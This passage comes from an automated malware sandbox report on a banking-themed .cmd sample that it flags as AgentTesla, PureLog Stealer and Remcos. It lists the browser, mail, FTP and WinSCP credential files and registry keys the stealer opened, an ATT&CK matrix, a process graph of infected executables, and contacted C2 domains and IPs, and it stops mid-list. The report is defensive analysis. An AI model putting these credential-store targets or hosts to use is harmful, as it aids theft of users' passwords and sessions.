                    Source: Yara matchFile source: 00000020.00000003.1680680146.000000000089E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1948863536.0000000005180000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.1847868691.0000000000891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000002.2058811491.00000000050D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1941635606.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000002.2046318436.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000002.2060060540.0000000005740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1957754324.0000000005A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1916978924.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000002.2058173274.0000000003E55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000002.2051386089.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 2724, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1931595213.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000002.2051386089.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 2724, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2b26216.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.3eac190.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.3.Native_neworigin.exe.891c18.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.89ece0.17.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2b26216.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.89ece0.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5180f08.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.2ad6216.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.3e55570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5180000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.2ad6216.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.50d0f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5a20000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3fdc190.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2b2711e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5180f08.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.50d0f08.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.3.Native_neworigin.exe.891c18.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.5740000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.2ad711e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.3eac190.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5180000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3fdc190.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.50d0000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.3e56478.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.3e56478.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2b2711e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.50d0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.5740000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.3e55570.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.2ad711e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000020.00000003.1680680146.000000000089E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1948863536.0000000005180000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.1847868691.0000000000891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000002.2058811491.00000000050D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1941635606.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000002.2046318436.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000002.2060060540.0000000005740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1957754324.0000000005A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1916978924.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000002.2058173274.0000000003E55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13654A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,9_2_00007FF7F13654A0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1385648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,9_2_00007FF7F1385648
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,9_2_00007FF7F136227C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,9_2_00007FF7F137E568

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts                    		121
                    Windows Management Instrumentation                    		1
                    LSASS Driver                    		1
                    LSASS Driver                    		31
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    System Time Discovery                    		1
                    Taint Shared Content                    		12
                    Archive Collected Data                    		3
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    Data Encrypted for Impact
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Shared Modules                    		2
                    Valid Accounts                    		2
                    Valid Accounts                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		1
                    System Network Connections Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		21
                    Access Token Manipulation                    		1
                    Install Root Certificate                    		NTDS3
                    File and Directory Discovery                    		Distributed Component Object Model21
                    Input Capture                    		4
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchd21
                    Registry Run Keys / Startup Folder                    		311
                    Process Injection                    		11
                    Software Packing                    		LSA Secrets48
                    System Information Discovery                    		SSH1
                    Clipboard Data                    		125
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                    Scheduled Task/Job                    		1
                    Timestomp                    		Cached Domain Credentials1
                    Query Registry                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items21
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		DCSync251
                    Security Software Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job431
                    Masquerading                    		Proc Filesystem1
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                    Valid Accounts                    		/etc/passwd and /etc/shadow151
                    Virtualization/Sandbox Evasion                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
                    Virtualization/Sandbox Evasion                    		Network Sniffing1
                    Application Window Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                    Access Token Manipulation                    		Input Capture1
                    System Owner/User Discovery                    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task311
                    Process Injection                    		Keylogging1
                    System Network Configuration Discovery                    		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557464 Sample: Ziraat_Bankasi_Swift_Mesaji... Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 124 zyiexezl.biz 2->124 126 zrlssa.biz 2->126 128 129 other IPs or domains 2->128 146 Suricata IDS alerts for network traffic 2->146 148 Found malware configuration 2->148 150 Malicious sample detected (through community Yara rule) 2->150 152 18 other signatures 2->152 11 alg.exe 2->11         started        16 cmd.exe 1 2->16         started        18 Juqmtmya.PIF 2->18         started        20 4 other processes 2->20 signatures3 process4 dnsIp5 140 dlynankz.biz 85.214.228.140, 50059, 50100, 80 STRATOSTRATOAGDE Germany 11->140 142 gytujflc.biz 208.100.26.245, 50021, 50030, 50056 STEADFASTUS United States 11->142 144 13 other IPs or domains 11->144 116 C:\Program Files\...\updater.exe, PE32+ 11->116 dropped 118 C:\Program Files\...\private_browsing.exe, PE32+ 11->118 dropped 120 C:\Program Files\...\plugin-container.exe, PE32+ 11->120 dropped 122 127 other malicious files 11->122 dropped 202 Creates files in the system32 config directory 11->202 204 Drops executable to a common third party application directory 11->204 206 Infects executable files (exe, dll, sys, html) 11->206 22 AnyDesk.PIF 1 7 16->22         started        27 extrac32.exe 1 16->27         started        29 alpha.exe 1 16->29         started        33 5 other processes 16->33 208 Writes to foreign memory regions 18->208 210 Allocates memory in foreign processes 18->210 212 Sample uses process hollowing technique 18->212 31 aymtmquJ.pif 18->31         started        file6 signatures7 process8 dnsIp9 136 gxe0.com 198.252.105.91, 443, 49699, 49700 HAWKHOSTCA Canada 22->136 108 C:\Users\Public\Libraries\aymtmquJ.pif, PE32 22->108 dropped 110 C:\Users\Public\Libraries\Juqmtmya, data 22->110 dropped 112 C:\Users\Public\Juqmtmya.url, MS 22->112 dropped 188 Drops PE files with a suspicious file extension 22->188 190 Writes to foreign memory regions 22->190 192 Allocates memory in foreign processes 22->192 200 2 other signatures 22->200 35 aymtmquJ.pif 22->35         started        39 cmd.exe 1 22->39         started        41 esentutl.exe 2 22->41         started        114 C:\Users\Public\alpha.exe, PE32+ 27->114 dropped 194 Drops PE files to the user root directory 27->194 196 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 27->196 198 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 27->198 43 kn.exe 3 2 29->43         started        45 Native_neworigin.exe 31->45         started        47 kn.exe 2 33->47         started        49 extrac32.exe 1 33->49         started        file10 signatures11 process12 file13 82 C:\Users\user\AppData\...\Trading_AIBot.exe, PE32 35->82 dropped 84 C:\Users\user\...84ative_neworigin.exe, PE32 35->84 dropped 86 C:\Program Files (x86)\...\armsvc.exe, PE32 35->86 dropped 154 Drops executable to a common third party application directory 35->154 156 Infects executable files (exe, dll, sys, html) 35->156 51 Native_neworigin.exe 35->51         started        56 Trading_AIBot.exe 35->56         started        58 esentutl.exe 2 39->58         started        60 alpha.pif 39->60         started        62 esentutl.exe 2 39->62         started        66 3 other processes 39->66 88 C:\Users\Public\Libraries\Juqmtmya.PIF, PE32 41->88 dropped 64 conhost.exe 41->64         started        158 Registers a new ROOT certificate 43->158 160 Drops PE files with a suspicious file extension 43->160 162 Tries to steal Mail credentials (via file / registry access) 45->162 164 Tries to harvest and steal browser information (history, passwords, etc) 45->164 90 C:\Users\Public\Libraries\AnyDesk.PIF, PE32 47->90 dropped 92 C:\Users\Public\kn.exe, PE32+ 49->92 dropped signatures14 process15 dnsIp16 130 s82.gocheapweb.com 51.195.88.199, 49922, 49956, 50002 OVHFR France 51->130 132 lpuegx.biz 82.112.184.197, 49936, 49955, 49962 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU Russian Federation 51->132 134 5 other IPs or domains 51->134 94 C:\Windows\System32\alg.exe, PE32+ 51->94 dropped 96 C:\Windows\System32\FXSSVC.exe, PE32+ 51->96 dropped 98 DiagnosticsHub.Sta...llector.Service.exe, PE32+ 51->98 dropped 100 C:\Windows\System32\AppVClient.exe, PE32+ 51->100 dropped 168 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 51->168 170 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 51->170 172 Tries to steal Mail credentials (via file / registry access) 51->172 186 4 other signatures 51->186 102 C:\Users\user\AppData\Roaming\...\apihost.exe, PE32 56->102 dropped 174 Uses schtasks.exe or at.exe to add and modify task schedules 56->174 176 Drops large PE files 56->176 178 Adds a directory exclusion to Windows Defender 56->178 68 powershell.exe 56->68         started        71 schtasks.exe 56->71         started        104 C:\Users\Public\alpha.pif, PE32 58->104 dropped 180 Drops PE files to the user root directory 58->180 182 Drops PE files with a suspicious file extension 58->182 184 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 58->184 73 xpha.pif 60->73         started        106 C:\Users\Public\xpha.pif, PE32 62->106 dropped file17 signatures18 process19 dnsIp20 166 Loading BitLocker PowerShell Module 68->166 76 conhost.exe 68->76         started        78 WmiPrvSE.exe 68->78         started        80 conhost.exe 71->80         started        138 127.0.0.1 unknown unknown 73->138 signatures21 process22

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd13%ReversingLabsScript-BAT.Trojan.Remcos

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    uaafd.biz
                    		3.254.94.185
                    		truefalse
                      		high
                      xnxvnn.biz
                      		13.251.16.150
                      		truefalse
                        		high
                        nlscndwp.biz
                        		54.244.188.177
                        		truefalse
                          		high
                          vjaxhpbji.biz
                          		82.112.184.197
                          		truefalse
                            		high
                            s82.gocheapweb.com
                            		51.195.88.199
                            		truefalse
                              		high
                              ytctnunms.biz
                              		3.94.10.34
                              		truefalse
                                		high
                                qncdaagct.biz
                                		47.129.31.212
                                		truefalse
                                  		high
                                  ctdtgwag.biz
                                  		3.94.10.34
                                  		truefalse
                                    		high
                                    tbjrpv.biz
                                    		34.246.200.160
                                    		truefalse
                                      		high
                                      kcyvxytog.biz
                                      		18.208.156.248
                                      		truefalse
                                        		high
                                        ereplfx.biz
                                        		18.246.231.120
                                        		truefalse
                                          		high
                                          apzzls.biz
                                          		34.211.97.45
                                          		truefalse
                                            		high
                                            sxmiywsfv.biz
                                            		13.251.16.150
                                            		truefalse
                                              		high
                                              pgfsvwx.biz
                                              		18.208.156.248
                                              		truefalse
                                                		high
                                                przvgke.biz
                                                		172.234.222.138
                                                		truefalse
                                                  		high
                                                  ocsvqjg.biz
                                                  		3.254.94.185
                                                  		truefalse
                                                    		high
                                                    ecxbwt.biz
                                                    		54.244.188.177
                                                    		truefalse
                                                      		high
                                                      bghjpy.biz
                                                      		34.211.97.45
                                                      		truefalse
                                                        		high
                                                        damcprvgv.biz
                                                        		18.208.156.248
                                                        		truefalse
                                                          		high
                                                          gnqgo.biz
                                                          		18.208.156.248
